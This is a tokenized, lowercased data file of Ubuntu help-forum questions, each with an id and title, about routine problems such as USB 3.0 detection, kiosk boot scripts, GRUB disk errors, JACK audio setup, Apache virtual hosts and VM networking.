485946	ubuntu server usb version	i installed ubuntu server 14.04 on a new server machine . i was planning to get an external usb hard disk for data backup purposes . my motherboard is intel s1200v3rps which shows on intel page usb 3.0 with 4 ports . however , i have 6 ports on my machine and when i do lsusb on it i get the following output naveen @ ubserver : ~/ordcode $ lsusb bus 002 device 002 : id 8087:8000 intel corp . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:8008 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 058 : id 413c:9013 dell computer corp . bus 003 device 004 : id 046b : ff10 american megatrends , inc . virtual keyboard and mouse bus 003 device 031 : id 046d : c05a logitech , inc. m90/m100 optical mouse bus 003 device 002 : id 046d : c31c logitech , inc . keyboard k120 for business bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub this shows 4 buses with 8 devices and most have 2.0 root hub and only one is 3.0 root hub ? does this mean that only one port of mine supports usb 3.0 ?
485948	different behavior on reboots - ubuntu server 14.04	i am setting up a kiosk system using ubuntu 14.04 server edition which will be located in various places around the state . these are going to be unattended kiosks and i need to have them boot back up automatically if there is a power failure . the problem i am having is that about 10 % of the time when the units boot up it does n't start the browser . i do not have a desktop installed , the os boots up and should kick into an xwindow version of chromium browser . when this is n't working i end up with a black screen with a login prompt . can anyone suggest how i can fix this behavior so that it will insure that the desktop-less chromium will always boot up ? this is what i have set up : 1 ) /usr/lib/xsessions/chromekiosk.sh : # ! /bin/bash while true ; do google-chrome % u -- icognito ; sleep 5s ; done 2 ) /usr/share/xsessions/kiosk.desktop [ desktop entry ] encoding=utf-8 name=kiosk mode comment=chromium kiosk mode exec=/usr/share/xsessions/chromekiosk.sh type=application thanks ! anthony
485955	permission denied when create new file	i could create file with php fopen ( .. ) when i used the ubuntu 12.04 . but now i ca n't create file with php , because i pass ubuntu 14.04 . i can open existing file to read or to write . but i ca n't create new file because of permission denied . fopen ( ../../../../../desktop/file ) : failed to open stream : permission denied in /var/www/html/createfolder.php on line 17 can not open file : ../../../../..//desktop/file '' error is occured . $ my_file = `` .. '' . directory_separator . `` .. '' . directory_separator . `` .. '' . directory_separator . `` .. '' . directory_separator . `` .. '' . directory_separator . `` home '' . directory_separator . `` username '' . directory_separator . `` desktop '' . directory_separator . `` file '' ; $ handle = fopen ( $ my_file , 'w ' ) or die ( ' can not open file : '. $ my_file ) ; $ data = 'new data line 1 ' ; fwrite ( $ handle , $ data ) ; $ new_data = `` \n '' . 'new data line 2 ' ; fwrite ( $ handle , $ new_data ) ;
485959	how to remove -virtualbox text	i installed elementary os in virtualbox , and when i open a terminal , my current user looks like : cypher @ cypher -virtualbox : ~ $ my question is , how do i remove the -virtualbox text , is there a way to do that ?
485960	what program should i use with a gzip archive	i am trying to download grub-1.99.tar.gz , i do not know what program to use to open a gzip file . please recommend
485968	ubuntu install erased windows	when trying to install ubuntu i selected the default checked `` erase hardrive '' option and checked the second box below it ( below an option to encrypt which i did n't select ) which had to do with installing tools to make partitioning easier . there was a small warning in red text around the erase hard drive option that said it would delete all my files , but i clicked continue anyway because i assumed i 'd be given an option to revert or some kind of warning if this really would mess up my system . instead though , it sent me to the choose your location screen within the applet and the back button became grayed and unusable , which is when i worried that it may have messed up my partitions . ( it technically has no valid os i can boot from now ... ) i exited the installer then and shut down , and upon trying to boot into windows i simply had a black screen with a `` _ '' sign at the top left hand corner phasing in and out , without any ability to access windows , or any other os because i actually did n't install linux but just let the applet reconfigure the partitions . my first question to all of you out there is a , is there any simple way i can get my partition structure back and boot into windows , especially seeing how it was so easy to revert modified partitions within the ubuntu applet , and how ? ! i 've installed ubuntu-rescue-remix onto a usb and am messing with it using testdisk and their guide but it either does n't seem to be working or i have no idea what i 'm doing . there does n't seem to be much in the way of clear answers about how to undo something which is as simple as a messed up file structure , so if this is n't the best way , anyone who knows better please give a shout out or advice ! worst case i guess i 'll just fully install ubuntu on the computer and try to salvage the files onto an external hard drive and reinstall windows . either this or take it to a specialist . it just seems stupid that a simple continue button being clicked/tapped is the difference between the user moving on to something else or being hit with something they have to go through immense trouble to fix . update , this guy had the same problem : windows 7 to ubuntu - erased data / but additional suggestions or links to step by steps appreciated does boot-repair work for this ? ... ... ... . my second question , b , is a request : is there any way the ubuntu install applets ' developers would consider adding warning features like bright flashing lights or a warning popup to tell you that hard drive erasure is not easily reversible if you press continue from within the applet , like how windows and other os security and system popups often do when they 're warning that you might be about to do something stupid ? or advice that we need to either destroy a partition structure and risk data loss or resize the partition safely on our main operating system in order to install ubuntu safely ? if i 'd been told by the applet clearly that i had no options to install linux without messing with partitions and risking data loss , i would have just taken it to a computer specialist about the windows computer going slow or freezing after login instead of having to play specialist or hire one to salvage my data . i 'm sure i 'm not the only one who 's had this problem , and it seems like a simple fix like this could save people a lot of frustration and heartache , both in ubuntu from canonical and forks from the mint and kubuntu projects . please ubuntu developers , help the 'visual-learners ' and novice-tinkerers who need to be given flashing warning signs in order to not destroy their computers ! ! ! do it for the children ! ! ! do it for the exclamation points ! ! ! do it for me , so i do n't feel as bad about this mistake being repeated again despite this bad experience with it ! ! ! ! ! please/ just/ do it ! ! ! ! ! ! ! ! ! ! !
485973	after first software update on ubuntu 14.04 pc boots to a black screen	i 've installed ubuntu 14.04 twice on my optiplex 990 dell computer . both times , after first software update the pc boots to a black screen . i thought it was a video driver problem , so the second time before the software update i changed from the generic drivers to a proprietary one . i 've tried many things to try to recover the linux installation , but nothing seemed to work . i 've installed ubuntu 14.04 a third time , but now i have n't installed software updates . what should i do ? my hardware profile can be found here . the result from sudo apt-get upgrade andre @ andre-optiplex-990 : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following package was automatically installed and is no longer required : kde-l10n-engb use 'apt-get autoremove ' to remove it . the following packages have been kept back : libqt5gui5 linux-generic linux-headers-generic linux-image-generic the following packages will be upgraded : account-plugin-aim account-plugin-jabber account-plugin-salut account-plugin-yahoo app-install-data apport apport-gtk apt apt-transport-https apt-utils bash bsdutils compiz compiz-core compiz-gnome compiz-plugins-default cups-browsed cups-filters cups-filters-core-drivers dpkg duplicity empathy empathy-common evince evince-common evolution-data-server evolution-data-server-common evolution-data-server-online-accounts firefox firefox-locale-en firefox-locale-es flashplugin-installer fontconfig fontconfig-config gdb gettext gettext-base ghostscript ghostscript-x gir1.2-ebook-1.2 gir1.2-ebookcontacts-1.2 gir1.2-edataserver-1.2 gir1.2-freedesktop gir1.2-glib-2.0 gir1.2-gst-plugins-base-1.0 gir1.2-gstreamer-1.0 gir1.2-gtk-3.0 gir1.2-gudev-1.0 gir1.2-javascriptcoregtk-3.0 gir1.2-rb-3.0 gir1.2-webkit-3.0 gnome-calculator gnome-control-center-shared-data gnome-settings-daemon-schemas gnome-sudoku gstreamer1.0-alsa gstreamer1.0-libav gstreamer1.0-plugins-bad gstreamer1.0-plugins-bad-faad gstreamer1.0-plugins-bad-videoparsers gstreamer1.0-plugins-base gstreamer1.0-plugins-base-apps gstreamer1.0-plugins-good gstreamer1.0-pulseaudio gstreamer1.0-tools gstreamer1.0-x hud ifupdown im-config indicator-printers initramfs-tools initramfs-tools-bin iputils-arping iputils-ping iputils-tracepath kate-data katepart kde-runtime kde-runtime-data kdelibs-bin kdelibs5-data kdelibs5-plugins kdoctools language-pack-en language-pack-gnome-en libapt-inst1.5 libapt-pkg4.12 libasprintf-dev libasprintf0c2 libbaloocore4 libbaloofiles4 libbalooxapian4 libblkid1 libcamel-1.2-45 libcgmanager0 libcompizconfig0 libcupsfilters1 libdecoration0 libdpkg-perl libebackend-1.2-7 libebook-1.2-14 libebook-contacts-1.2-0 libecal-1.2-16 libedata-book-1.2-20 libedata-cal-1.2-23 libedataserver-1.2-18 libegl1-mesa libegl1-mesa-drivers libelf1 libevdocument3-4 libevview3-3 libfontconfig1 libfontembed1 libfreetype6 libgail-3-0 libgail-common libgail18 libgbm1 libgettextpo-dev libgettextpo0 libgexiv2-2 libgirepository-1.0-1 libgl1-mesa-dri libgl1-mesa-glx libglapi-mesa libgles2-mesa libgnome-control-center1 libgnutls-openssl27 libgnutls26 libgs9 libgs9-common libgstreamer-plugins-bad1.0-0 libgstreamer-plugins-base1.0-0 libgstreamer-plugins-good1.0-0 libgstreamer1.0-0 libgtk-3-0 libgtk-3-bin libgtk-3-common libgtk2.0-0 libgtk2.0-bin libgtk2.0-common libgudev-1.0-0 libhud2 libido3-0.1-0 libjavascriptcoregtk-3.0-0 libjbig0 libjson-c2 libjson0 libkatepartinterfaces4 libkcmutils4 libkde3support4 libkdeclarative5 libkdecore5 libkdesu5 libkdeui5 libkdewebkit5 libkdnssd4 libkemoticons4 libkfile4 libkhtml5 libkidletime4 libkio5 libkjsapi4 libkjsembed4 libkmediaplayer4 libknewstuff3-4 libknotifyconfig4 libkntlm4 libkparts4 libkprintutils4 libkpty4 libkrosscore4 libktexteditor4 libkxmlrpcclient4 liblightdm-gobject-1-0 libmount1 libnautilus-extension1a libnepomuk4 libnepomukcleaner4 libnepomukcore4abi1 libnepomukquery4a libnepomukutils4 libnm-gtk-common libnm-gtk0 libokularcore4 libopenvg1-mesa liboxideqt-qmlplugin libpam-systemd libplasma3 libpurple-bin libpurple0 libqt5core5a libqt5dbus5 libqt5network5 libqt5opengl5 libqt5printsupport5 libqt5qml5 libqt5quick5 libqt5sql5 libqt5sql5-sqlite libqt5test5 libqt5widgets5 libqt5xml5 librhythmbox-core8 libsane libsane-common libselinux1 libsmbclient libsolid4 libssl1.0.0 libsystemd-daemon0 libsystemd-journal0 libsystemd-login0 libthreadweaver4 libtiff5 libudev1 libunity-control-center1 libunity-core-6.0-9 libuuid1 libwayland-egl1-mesa libwbclient0 libwebkitgtk-3.0-0 libwebkitgtk-3.0-common libwhoopsie0 libxatracker2 libxfont1 libxml2 libxml2-utils lightdm linux-firmware linux-headers-3.13.0-24 linux-headers-3.13.0-24-generic linux-image-3.13.0-24-generic linux-image-extra-3.13.0-24-generic linux-libc-dev locales ltrace mcp-account-manager-uoa mount nautilus nautilus-data nautilus-sendto-empathy nepomuk-core-data nepomuk-core-runtime network-manager-gnome okular openssh-client openssl patch plasma-scriptengine-javascript python-cupshelpers python-libxml2 python-pexpect python-samba python3-apport python3-lxml python3-problem-report python3-software-properties python3-update-manager qtdeclarative5-dialogs-plugin qtdeclarative5-localstorage-plugin qtdeclarative5-privatewidgets-plugin qtdeclarative5-qtquick2-plugin qtdeclarative5-ubuntu-ui-extras-browser-plugin qtdeclarative5-ubuntu-ui-extras-browser-plugin-assets qtdeclarative5-window-plugin rhythmbox rhythmbox-data rhythmbox-mozilla rhythmbox-plugin-cdrecorder rhythmbox-plugin-magnatune rhythmbox-plugin-zeitgeist rhythmbox-plugins rsync samba-common samba-common-bin samba-libs sane-utils simple-scan smbclient software-center software-properties-common software-properties-gtk ssh-askpass-gnome system-config-printer-common system-config-printer-gnome system-config-printer-udev systemd-services thunderbird thunderbird-gnome-support thunderbird-locale-en thunderbird-locale-en-gb thunderbird-locale-en-us thunderbird-locale-es thunderbird-locale-es-ar thunderbird-locale-es-es tzdata ubuntu-drivers-common udev unity unity-control-center unity-greeter unity-services unity-settings-daemon update-manager update-manager-core usb-creator-common usb-creator-gtk util-linux uuid-runtime webapp-container webbrowser-app whoopsie xserver-xorg-video-ati xserver-xorg-video-radeon xul-ext-ubufox 316 upgraded , 0 newly installed , 0 to remove and 4 not upgraded . need to get 256 mb/258 mb of archives . after this operation , 19,4 mb of additional disk space will be used .
485977	clean-up options for ubuntu ( 13.10 )	i am looking for good tools that can be used to get rid of useless clutter of the system . note that i 'm not talking about deleting useless things , that i can manually do . i am looking for tools like defragmenters , disk cleaners , those tools that delete duplicate files , those that can remove cache and useless application data , etc . neither am i looking for a single tool that does this all , but i think my most gripes can be combined and a most of three tools will do the job . the tag cleanup has this : ... removing temporary , unnecessary , redundant files or libraries ; also ... cleaning the cache , logs , etc .
485978	error : attempt to read or write outside of disk 'hd0 '	before i start , i 'd like to mention a few things . i 'm quite a newbie , and do not know much about ubuntu . all i wanted was to be able to have a dual boot windows7/ubuntu , the latter being a backup when my windows get a bit slow . it 's been working fine , and i have mostly been browsing on firefox with it . i have very little knowledge of ubuntu ( i do n't know how to do commands , `` sudo '' things etc ) . i 've looked up my question a few times , and words such as `` kernel '' pop up , which confuse me . so please , be tolerant and patient with me ! : ) a few days ago , my laptop fell from the desk ( cables hanging , pulled on by a foot ... ) . i 've had this laptop for over 3 years and it fell a few times ( i 'm very clumsy ) , nothing major happened to it appart from a few scuffs . yet , since this happened , my computer seems to refuse to boot properly , and at the `` grub '' , where you select between ubuntu and windows , i get the error `` attempt to read or write outside of disk 'hd0 ' '' . if i try to boot windows , nothing happens . i suspect it is due to the computer falling and possibly damaging the hard drive , but i am not sure . i did try and install a few programs before ( such as vlc etc ) while on ubuntu , attempting at the `` sudo '' thingies ... could i have done something wrong to mess up the whole hard drive ? in any case , since this happened , i have not been able to boot my computer , and right now am using an old laptop to post this message . i have a little bit of knowledge on dismantling laptops , so i removed the hard drive from the laptop and connected it to this one . it does the same error , so i confirmed ( to myself ) that it was n't hardware problems of the laptop but just the hard drive . thank you for your time , and many thanks if you can help me !
485982	ca n't see desktop	i tried to remove the guest account following the instructions on this page removing guest session at login in ubuntu 14.04 i followed the steps and then restarted the laptop . as usual the lenovo icon came and then the ubuntu icon , but , after that when usually lock screen showed up , the display went off but the laptop was on . i pressed the power button and the ubuntu icon came and the laptop shut down . i ca n't see the lock screen and the desktop . how can i bring back the display ? i have a 320 gigs hdd without any partition and ubuntu as the main os ( no dual boot ) . is there any way to resolve the problem without losing any data ? i have really important data in the laptop . please help !
485985	use dd from virtualbox to external hd ?	i want to clone my vm oracle to a another/external hd in my computer . my vm is a ubuntu 14.04 , and i want to use dd command in a external hd . is possible ? when o use # fdisk -l appear just the vm machine , and do not show others hd . thanks !
485987	how do i stop system monitor from being transparent ?	i just installed ubuntu 14.04 and system monitor is n't working properly . i can not resize the window and the white background/transparent is missing when i go the the resources tab .
485988	tascam us-122l usb audio interface + jackd	i 'm trying to get a tascam us-122l usb 2.0 audio/midi interface working with jackd . the correct kernel modules seem to load when i plug the device in : $ lsmod | grep us122l snd_usb_us122l 23020 0 snd_usbmidi_lib 29476 1 snd_usb_us122l snd_hwdep 17709 2 snd_usb_us122l , snd_hda_codec snd 78957 18 snd_usb_us122l , snd_usbmidi_lib , snd_hda_codec_analog , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device alsa seems to detect the card : $ cat /proc/asound/cards 0 [ sb ] : hda-intel - hda ati sb hda ati sb at 0x60000000 irq 16 1 [ us122l ] : usb us-122l - tascam us-122l tascam us-122l ( 644:800e if 0 at 001/004 ) also : $ aplay -l default playback/recording through the pulseaudio sound server sysdefault : card=sb hda ati sb , ad198x analog default audio device front : card=sb , dev=0 hda ati sb , ad198x analog front speakers surround40 : card=sb , dev=0 hda ati sb , ad198x analog 4.0 surround output to front and rear speakers surround41 : card=sb , dev=0 hda ati sb , ad198x analog 4.1 surround output to front , rear and subwoofer speakers surround50 : card=sb , dev=0 hda ati sb , ad198x analog 5.0 surround output to front , center and rear speakers surround51 : card=sb , dev=0 hda ati sb , ad198x analog 5.1 surround output to front , center , rear and subwoofer speakers surround71 : card=sb , dev=0 hda ati sb , ad198x analog 7.1 surround output to front , center , side , rear and woofer speakers dmix : card=sb , dev=0 hda ati sb , ad198x analog direct sample mixing device dsnoop : card=sb , dev=0 hda ati sb , ad198x analog direct sample snooping device hw : card=sb , dev=0 hda ati sb , ad198x analog direct hardware device without any conversions plughw : card=sb , dev=0 hda ati sb , ad198x analog hardware device with all software conversions usb_stream : card=sb hda ati sb usb_stream : card=us122l tascam us-122l the card also shows up in qjackctl , but when i select it as interface and try to start jackd , i get the following error : 16:37:20.811 d-bus : jack server could not be started . sorry can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started fri jun 20 16:37:20 2014 : starting jack server ... fri jun 20 16:37:20 2014 : jack server starting in realtime mode with priority 10 fri jun 20 16:37:20 2014 : control device hw:1 fri jun 20 16:37:20 2014 : control device hw:1 fri jun 20 16:37:20 2014 : acquired audio card audio1 fri jun 20 16:37:20 2014 : creating alsa driver ... hw:1|hw:1|1024|2|44100|0|0|nomon|swmeter|-|32bit fri jun 20 16:37:20 2014 : control device hw:1 fri jun 20 16:37:20 2014 : error : alsa : can not open pcm device alsa_pcm for playback . falling back to capture-only mode fri jun 20 16:37:20 2014 : error : can not initialize driver fri jun 20 16:37:20 2014 : error : jackserver : :open ( ) failed with -1 fri jun 20 16:37:20 2014 : error : failed to open server fri jun 20 16:37:21 2014 : saving settings to `` /home/kraxor/.config/jack/conf.xml '' ... 16:37:36.683 could not connect to jack server as client . - overall operation failed . - unable to connect to server . please check the messages window for more info . can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started tried to modify /etc/security/limits.conf and ~/.asoundrc according to the answer to this question , but it did n't solve the problem . currently they look like this : $ cat .asoundrc | grep -v \ # pcm . ! usb_stream { @ args [ card ] @ args.card { type string default `` 1 '' } type usb_stream card $ card } ctl . ! usb_stream { @ args [ card ] @ args.card { type string default `` 1 '' } type hw card $ card } $ cat /etc/security/limits.conf | grep -v \ # @ audio - rtpio 99 @ audio - memlock unlimited @ audio - nice -10 the same happens with xubuntu 14.04 and ubuntu studio 12.04 . any suggestions are greatly appreciated . this card should be supported as far as i know .
485989	how to install windows 8 pro after installing ubuntu 14.04	i have installed ubuntu 14.04 in my lenovo g505s laptop and now i also want to install windows 8 pro . i have already done an ntfs partition through gparted partion editor in ubuntu . this is the same partition where i want to install my windows 8 pro . i want to do a dual boot . please help .
485990	will ubuntu media stream like windows ?	i have many wireless devices and am in process of building an ubuntu media tower , i am wondering if i can stream from my pc to other devices like windows ? thanks in advance !
485992	issues intalling matlab r2012a 32bit student version on ubuntu 14.04 64bit	after having read https : //help.ubuntu.com/community/matlab and successfully installed this version of matlab on other versions of ubuntu i am running into the following issues when installing from the dvd ( essentially the installer never launches ) : bart @ bart-aa-7760 : /media/bart/mathworks_r2012a $ ./install -glnx86 preparing installation files ... installing ... exception in thread `` main '' java.lang.noclassdeffounderror : could not initialize class java.awt.component at java.lang.class.forname0 ( native method ) at java.lang.class.forname ( unknown source ) at $ proxy11 . ( unknown source ) at sun.reflect.nativeconstructoraccessorimpl.newinstance0 ( native method ) at sun.reflect.nativeconstructoraccessorimpl.newinstance ( unknown source ) at sun.reflect.delegatingconstructoraccessorimpl.newinstance ( unknown source ) at java.lang.reflect.constructor.newinstance ( unknown source ) at java.lang.reflect.proxy.newproxyinstance ( unknown source ) at com.google.inject.internal.constructioncontext.createproxy ( constructioncontext.java:81 ) at com.google.inject.constructorinjector.construct ( constructorinjector.java:70 ) at com.google.inject.constructorbindingimpl $ factory.get ( constructorbindingimpl.java:111 ) at com.google.inject.factoryproxy.get ( factoryproxy.java:56 ) at com.google.inject.providertointernalfactoryadapter $ 1.call ( providertointernalfactoryadapter.java:45 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:811 ) at com.google.inject.providertointernalfactoryadapter.get ( providertointernalfactoryadapter.java:42 ) at com.google.inject.scopes $ 1 $ 1.get ( scopes.java:54 ) at com.google.inject.internalfactorytoprovideradapter.get ( internalfactorytoprovideradapter.java:48 ) at com.google.inject.injectorimpl $ 4 $ 1.call ( injectorimpl.java:758 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:811 ) at com.google.inject.injectorimpl $ 4.get ( injectorimpl.java:754 ) at com.google.inject.spi.providerlookup $ 1.get ( providerlookup.java:89 ) at com.google.inject.spi.providerlookup $ 1.get ( providerlookup.java:89 ) at com.google.inject.internal.providermethod.get ( providermethod.java:95 ) at com.google.inject.internalfactorytoprovideradapter.get ( internalfactorytoprovideradapter.java:48 ) at com.google.inject.providertointernalfactoryadapter $ 1.call ( providertointernalfactoryadapter.java:45 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:811 ) at com.google.inject.providertointernalfactoryadapter.get ( providertointernalfactoryadapter.java:42 ) at com.google.inject.scopes $ 1 $ 1.get ( scopes.java:54 ) at com.google.inject.internalfactorytoprovideradapter.get ( internalfactorytoprovideradapter.java:48 ) at com.google.inject.singleparameterinjector.inject ( singleparameterinjector.java:42 ) at com.google.inject.singleparameterinjector.getall ( singleparameterinjector.java:66 ) at com.google.inject.constructorinjector.construct ( constructorinjector.java:84 ) at com.google.inject.constructorbindingimpl $ factory.get ( constructorbindingimpl.java:111 ) at com.google.inject.factoryproxy.get ( factoryproxy.java:56 ) at com.google.inject.singleparameterinjector.inject ( singleparameterinjector.java:42 ) at com.google.inject.singleparameterinjector.getall ( singleparameterinjector.java:66 ) at com.google.inject.constructorinjector.construct ( constructorinjector.java:84 ) at com.google.inject.constructorbindingimpl $ factory.get ( constructorbindingimpl.java:111 ) at com.google.inject.factoryproxy.get ( factoryproxy.java:56 ) at com.google.inject.singleparameterinjector.inject ( singleparameterinjector.java:42 ) at com.google.inject.singleparameterinjector.getall ( singleparameterinjector.java:66 ) at com.google.inject.constructorinjector.construct ( constructorinjector.java:84 ) at com.google.inject.constructorbindingimpl $ factory.get ( constructorbindingimpl.java:111 ) at com.google.inject.factoryproxy.get ( factoryproxy.java:56 ) at com.google.inject.providertointernalfactoryadapter $ 1.call ( providertointernalfactoryadapter.java:45 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:811 ) at com.google.inject.providertointernalfactoryadapter.get ( providertointernalfactoryadapter.java:42 ) at com.google.inject.scopes $ 1 $ 1.get ( scopes.java:54 ) at com.google.inject.internalfactorytoprovideradapter.get ( internalfactorytoprovideradapter.java:48 ) at com.google.inject.injectorimpl $ 4 $ 1.call ( injectorimpl.java:758 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:811 ) at com.google.inject.injectorimpl $ 4.get ( injectorimpl.java:754 ) at com.google.inject.spi.providerlookup $ 1.get ( providerlookup.java:89 ) at com.google.inject.spi.providerlookup $ 1.get ( providerlookup.java:89 ) at com.google.inject.internal.providermethod.get ( providermethod.java:95 ) at com.google.inject.internalfactorytoprovideradapter.get ( internalfactorytoprovideradapter.java:48 ) at com.google.inject.providertointernalfactoryadapter $ 1.call ( providertointernalfactoryadapter.java:45 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:811 ) at com.google.inject.providertointernalfactoryadapter.get ( providertointernalfactoryadapter.java:42 ) at com.google.inject.scopes $ 1 $ 1.get ( scopes.java:54 ) at com.google.inject.internalfactorytoprovideradapter.get ( internalfactorytoprovideradapter.java:48 ) at com.google.inject.singleparameterinjector.inject ( singleparameterinjector.java:42 ) at com.google.inject.singleparameterinjector.getall ( singleparameterinjector.java:66 ) at com.google.inject.constructorinjector.construct ( constructorinjector.java:84 ) at com.google.inject.constructorbindingimpl $ factory.get ( constructorbindingimpl.java:111 ) at com.google.inject.factoryproxy.get ( factoryproxy.java:56 ) at com.google.inject.providertointernalfactoryadapter $ 1.call ( providertointernalfactoryadapter.java:45 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:811 ) at com.google.inject.providertointernalfactoryadapter.get ( providertointernalfactoryadapter.java:42 ) at com.google.inject.scopes $ 1 $ 1.get ( scopes.java:54 ) at com.google.inject.internalfactorytoprovideradapter.get ( internalfactorytoprovideradapter.java:48 ) at com.google.inject.injectorimpl $ 4 $ 1.call ( injectorimpl.java:758 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:804 ) at com.google.inject.injectorimpl $ 4.get ( injectorimpl.java:754 ) at com.google.inject.injectorimpl.getinstance ( injectorimpl.java:793 ) at com.mathworks.wizard.wizardlauncher.startwizard ( wizardlauncher.java:160 ) at com.mathworks.wizard.wizardlauncher.start ( wizardlauncher.java:75 ) at com.mathworks.wizard.abstractlauncher.launch ( abstractlauncher.java:27 ) at com.mathworks.wizard.abstractlauncher.launchstandalone ( abstractlauncher.java:18 ) at com.mathworks.studentinstaller.launcher.main ( launcher.java:23 ) finished bart @ bart-aa-7760 : /media/bart/mathworks_r2012a $ the problem is the installer never launches even though i have openjdk java6 runtime installed as i found out matlab is incompatible with java7 . please advise what i should do at this point . thanks !
485994	error ( ? ) when converting wav to m4a with avconv	i have ripped some songs from a cd to wav files with the command , cdparanoia -vb i then convert these wav files to alac format with the command , for f in ./*.wav ; do avconv -i `` $ f '' -c : a alac `` $ { f % . * } .m4a '' ; done the following message is an example displayed at the end of each container conversion with the error near the top being `` max_analyze_duration reached '' and `` guessed channel layout for input stream # 0.0 : stereo '' . avconv version 9.13-6:9.13-0ubuntu0.14.04.1+fdkaac , copyright ( c ) 2000-2014 the libav developers built on may 10 2014 17:26:31 with gcc 4.8 ( ubuntu 4.8.2-19ubuntu1 ) [ wav @ 0x1cde840 ] max_analyze_duration reached guessed channel layout for input stream # 0.0 : stereo input # 0 , wav , from './15 - eels - mr e 's beautiful blues.wav ' : duration : 00:03:58.53 , bitrate : 1411 kb/s stream # 0.0 : audio : pcm_s16le , 44100 hz , stereo , s16 , 1411 kb/s output # 0 , ipod , to './15 - eels - mr e 's beautiful blues.m4a ' : metadata : encoder : lavf54.20.4 stream # 0.0 : audio : alac , 44100 hz , stereo , s16p , 200 kb/s stream mapping : stream # 0:0 - > # 0:0 ( pcm_s16le - > alac ) press ctrl-c to stop encoding size= 26984kb time=238.61 bitrate= 926.4kbits/s video:0kb audio:26964kb global headers:0kb muxing overhead 0.076887 % markrich @ markys-home-pc : /btrfs/music/itunes/temp/eels - daisies of the galaxy $ the m4a files do play , however some have the occasional artefacts within them that give the impression of those old fashioned lp things . can anyone suggest what i am doing wrong ? using ubuntu 14.04 cdparanoia iii , release 10.2 avconv , version 9.13-6:9.13-0ubuntu0.14.04.1+fdkaac
485997	how i do server path www ?	i have server ubuntu 14.04 and installed lamp . i like to making root of www.marinadev.com now this marinadev.com . i do know where config of server . sudo cp /etc/apache2/sites-available/000-default.conf /etc/apache2/sites-available/marinadev.com.conf sudo nano /etc/apache2/sites-available/marinadev.com.conf this is the content : < virtualhost *:80 > serveradmin webmaster @ localhost documentroot /var/www/html servername marinadev.com serveralias www.marinadev.com errorlog $ { apache_log_dir } /error.log customlog $ { apache_log_dir } /access.log combined < /virtualhost > and then : sudo a2ensite marinadev.com.conf sudo service apache2 restart
485999	apt indicator : 'error : brokencount > 0 '	i am getting the following error in the top menu bar : an error occurred . please run the package manager from the right-click menu or apt-get in a terminal to see what is wrong . the error message was : 'error : brokencount > 0 ' .
486000	question about routing vms with static ips in ubuntu ( unsolved )	i have a server with an external provider that is running ubuntu 12.04 . the server is having a static ip . i have installed vmware workstation and i am running some virtual machines , one of them is for example a windows server 2008 . my host has provided me with a subnet of static ips and i am trying to setup the virtual machine to have access to the internet . i have it in bridge mode in the settings of vmware . in the ipv4 settings of the ethernet adapter of windows i am having one of the static ips that is given to me and i have tried to setup the gateway with the gateway of the server , the static ip of the server and another ip that is mentioned as a gateway to the information of the server . but the windows machine can not access the internet . i suspect there is something with the routing options of ubuntu that i need to , but i have no idea what . can anyone help me with the problem . please feel free to ask any additional information . my provider can not support as they do not recommend to run vms on their servers . thanks for the help . the ip forwarding was deactivated so i activated it , but the problem still exists . here is the output of the ifconfig -a eth0 link encap : ethernet hwaddr 00:1c:42 : e9 : a2:7a inet adde : x.x.x.x bcast:0.0.0.0 mask:255.255.255.255 inet6 addr : xxxxxx scope : global inet6 addr : xxxxxx scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:140463 errors:0 dropped:0 overruns:0 frame:0 tx packets:193209 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:48302672 ( 48.3 mb ) tx bytes:60546508 ( 60.5 mb ) interrupt:23 base address:0x8200 eth0:1 link encap : ethernet hwaddr 00:1c:42 : e9 : a2:7a inet adde : y.y.252.240 bcast:0.0.0.0 mask:255.255.255.255 up broadcast running multicast mtu:1500 metric:1 interrupt:23 base address:0x8200' of the route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 x.x.30.1 0.0.0.0 ug 0 0 0 eth0 x.x.252.0 x.x.30.1 255.255.255.0 ug 0 0 0 eth0 x.x.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth0 x.x.30.1 0.0.0.0 255.255.255.255 uh 0 0 0 eth0
486002	peap wpa2 enterprise wireless connection at university not authenticating on ubuntu 14.04	i know this question has been asked multiple times before but before you answer please consider what i have done so far : used both username & domain\username changed the line `` system-ca-cert '' 's value from true to false and eventually deleted it chose the added trust and global sign certificates after the first attempt failed went to the it help desk at my university and they said they do not have a ca certificate come on here asking this question just to point out that it is not my drivers or my wlan card , it is connecting perfectly to other wifi networks at home , free hotspots and for places where a ca certificate is present . the wlan is working with no problems on my windows laptop which i have typed and accessed this on . my username and password are working well . it was working well before i replaced windows with ubuntu on my other laptop . if there is anyone who has come across such a problem before how did you solve the problem ? or if you have any suggestions you are welcome ! note : i am going home in ten days . i want to convert this pc i am typing on into an ubuntu pc .
486006	can not find boost-thread-mt library	i am compiling a program which requires boost-thread-mt library . i have installed libboost-all-dev using sudo apt-get install libboost-all-dev but compiler says that it can not find boost-thread-mt library . is this library in some other package ? please guide me what i need to install for this .
